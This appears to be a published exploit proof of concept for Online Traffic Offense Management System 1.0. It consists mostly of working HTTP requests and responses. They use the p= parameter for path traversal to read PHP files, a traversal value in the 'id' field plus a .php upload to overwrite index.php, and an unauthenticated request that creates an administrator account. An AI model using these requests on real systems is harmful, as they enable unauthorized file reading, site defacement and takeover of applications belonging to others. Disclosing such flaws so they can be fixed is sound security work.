# Exploit Title: Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### Privilage escalation
# All requests can be sent by both an authenticated and a non-authenticated user
# The vulnerabilities in the application allow for:
* Reading any PHP file from the server
* Saving files to parent and child directories and overwriting files in server
* Performing operations by an unauthenticated user with application administrator rights
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example 1 - Reading any PHP file from the server
Example vuln scripts:
http://localhost/traffic_offense/index.php?p=
http://localhost/traffic_offense/admin/?page=
# Request reading rrr.php file from other user in serwer
GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:09:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
[...]
Hacked file other user in serwer!
[...]
-----------------------------------------------------------------------------------------------------------------------
## Example 2 - Saving files to parent and child directories and overwriting files in server
# Request to read file
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:30:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15095
Online Traffic Offense Management System - PHP
[...]
-----------------------------------------------------------------------------------------------------------------------
# Request to overwrite file index.php in main directory webapp
POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403
Content-Length: 1928
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="id"
5/../../../index
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_id_no"
GBN-1020061
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="lastname"
Blake
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="firstname"
Claire
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="middlename"
C
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="dob"
1992-10-12
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="present_address"
Sample Addss 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="permanent_address"
Sample Addess 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="civil_status"
Married
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="nationality"
Filipino
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="contact"
09121789456
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_type"
Non-Professional
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="image_path"
uploads/drivers/
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="img"; filename="fuzzdb.php"
Content-Type: image/png
-----------------------------329606699635951312463334027403--
# New file have extention as this write filename="fuzzdb.php"
# New file have name and locate 5/../../../index we can save file in other directory ;)
# Line must start digit
# We can rewrite config files
-----------------------------------------------------------------------------------------------------------------------
# Respopnse
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:38:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"success"}
-----------------------------------------------------------------------------------------------------------------------
# Request to read file index.php again
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:42:17 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 42
Connection: close
Content-Type: text/html; charset=UTF-8
Hacked other client files in this hosting!
-----------------------------------------------------------------------------------------------------------------------
## Example 4 - Performing operations by an unauthenticated user with application administrator rights
# The application allows you to perform many operations without authorization, the application has no permission matrix. The entire application is vulnerable
# Request adding new admin user to application by sending a request by an authorized user
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 949
Origin: http://localhost
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"
21
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"
hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"
hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"
hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"
hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"
1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="aaa.php"
Content-Type: application/octet-stream
-----------------------------210106920639395210803657370685--
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:50:36 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8
1
# The request worked fine, log into the app using your hack account